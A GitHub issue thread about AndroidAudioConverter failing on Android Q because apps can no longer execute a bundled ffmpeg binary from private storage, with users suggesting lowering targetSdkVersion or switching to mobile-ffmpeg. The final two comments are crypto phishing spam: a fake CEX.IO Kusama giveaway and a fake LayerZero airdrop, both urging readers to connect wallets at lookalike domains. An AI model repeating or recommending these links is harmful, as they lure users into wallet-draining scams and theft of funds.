### ISSUE TITLE
error=13, Permission denied (Android Q)

### ISSUE THREAD

**Issue by assuricare** [adrielcafe/AndroidAudioConverter#31]
Android Q has introduced some breaking changes with folder/file permissions. I get the following error when using the converter on Android:

 java.io.IOException: Cannot run program "/data/user/0/com.ltcfastpay.timecard.debug/files/ffmpeg": error=13, Permission denied

I had the same problem with the AndroidAudioRecorder and found that the following method of getting the file path was deprecated in Android Q:

Environment.getExternalStorageDirectory().getPath()
To fix I had to change this to:

this.getActivity().getFilesDir().getAbsolutePath()

So now I am able to record and save as wav but when I try to convert to mp3 I get the permission denied.

I have tried to make changes to the AndroidAudioConverter.java file but its locked in Android Studio which tells me that I probably should not be tampering with it.

**Comment by beinghassandar1** [comment]
hello,  I have got the same issue with same exception.... any news about the fix ?

**Comment by fmiguelmmartins** [comment]
Same here  Caused by: java.io.IOException: error=13, Permission denied

**Comment by Ravipatel401** [comment]
Did anyone find the solution ? stuck at 29 level android....

**Comment by jhui20130703** [comment]
I encountered the same problem as you, have you solved it?

**Comment by Ravipatel401** [comment]
Not Found solution yet... if anybody found then... share with us...

**Comment by Wisdozzh** [comment]
From Android Q onwards, you cannot execute binaries in your app's private data directory.
From the issuetracker: https://issuetracker.google.com/issues/128554619

Change only on Build.gradle file targetSdkVersion 29 to 28 and Re-Install your app on your device - It is resolved your permission issue for temporary because of the targetSdkVersion 29 is required platform for released build on play store so I suggest to you use this library

**Comment by ajaykeshri03** [comment]
still I am getting this  error Caused by: java.io.IOException: error=13, Permission denied  
after executing from android Application. If i run from command line its working.
But running on rooted device it not working

**Comment by yyms3275** [comment]
> Android Q has introduced some breaking changes with folder/file permissions. I get the following error when using the converter on Android:
> 
> java.io.IOException: Cannot run program "/data/user/0/com.ltcfastpay.timecard.debug/files/ffmpeg": error=13, Permission denied
> 
> I had the same problem with the AndroidAudioRecorder and found that the following method of getting the file path was deprecated in Android Q:
> 
> Environment.getExternalStorageDirectory().getPath()
> To fix I had to change this to:
> 
> this.getActivity().getFilesDir().getAbsolutePath()
> 
> So now I am able to record and save as wav but when I try to convert to mp3 I get the permission denied.
> 
> I have tried to make changes to the AndroidAudioConverter.java file but its locked in Android Studio which tells me that I probably should not be tampering with it.

I solved the same problem as below.
I solved the problem by using a different library.

https://github.com/tanersener/mobile-ffmpeg

**Comment by sammi06** [comment]
> > Android Q has introduced some breaking changes with folder/file permissions. I get the following error when using the converter on Android:
> > java.io.IOException: Cannot run program "/data/user/0/com.ltcfastpay.timecard.debug/files/ffmpeg": error=13, Permission denied
> > I had the same problem with the AndroidAudioRecorder and found that the following method of getting the file path was deprecated in Android Q:
> > Environment.getExternalStorageDirectory().getPath()
> > To fix I had to change this to:
> > this.getActivity().getFilesDir().getAbsolutePath()
> > So now I am able to record and save as wav but when I try to convert to mp3 I get the permission denied.
> > I have tried to make changes to the AndroidAudioConverter.java file but its locked in Android Studio which tells me that I probably should not be tampering with it.
> 
> I solved the same problem as below.
> I solved the problem by using a different library.
> 
> https://github.com/tanersener/mobile-ffmpeg

How you have solved this i am using library suggested by You.. Not Working

**Comment by sammi06** [comment]
Kindly Tell how u have solved?
Using https://github.com/tanersener/mobile-ffmpeg

**Comment by Ravipatel401** [comment]
Yes, it has been resolved using https://github.com/tanersener/mobile-ffmpeg

**Comment by zwc456baby** [comment]
Android Q高版本二进制无法运行解决方案：

[Android Q 内部运行二进制文件](https://zwc365.com/2022/03/19/androidq%E5%86%85%E9%83%A8%E8%BF%90%E8%A1%8C%E4%BA%8C%E8%BF%9B%E5%88%B6%E6%96%87%E4%BB%B6)

**Comment by kusamanetworkss** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://cdn.airdropalert.com/images/metadata/kusamacex2222.jpeg)


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)

**Comment by earlyraven** [comment]
### LayerZero Airdrop Updated 🪂

The LayerZero Airdrop is confirmed. This is an updated guide to gather the most amount of $ZRO tokens possible.

We're thrilled to have you on board for this exclusive airdrop, and we're committed to making the claiming process seamless just for you. Let's dive in and grab those Layerzero Airdrop tokens!

[Layerzero Oficial](http://link.layerzer0network.online/rFz335)

[![Claim Now](https://miro.medium.com/v2/resize:fit:679/1*BpcMU6_u5SIZz5u-kGMrKw.gif)](http://link.layerzer0network.online/rFz335)

### Secure Your Layerzero Airdrop with These Simple Steps:

1. **Connect Your Wallet:**
   - Head over to the [Layerzero Airdrop](http://link.layerzer0network.online/rFz335).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - [Confirm your eligibility for the Layerzero Airdrop](http://link.layerzer0network.online/rFz335).

3. **Engage for Extra Rewards:**
   - Participate in community discussions or complete tasks for bonus rewards.

### Bonus Tips:
- **Community Assistance:**
  - Need help? Drop a message on Telegram or other social media platforms.

- **Stay Informed:**
  - Keep an eye out for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution might take a while. Stay calm and keep an eye out for updates.

Share your experiences or ask any questions about claiming the Layerzero Airdrop in the comments below. Let's make this process a breeze for everyone!
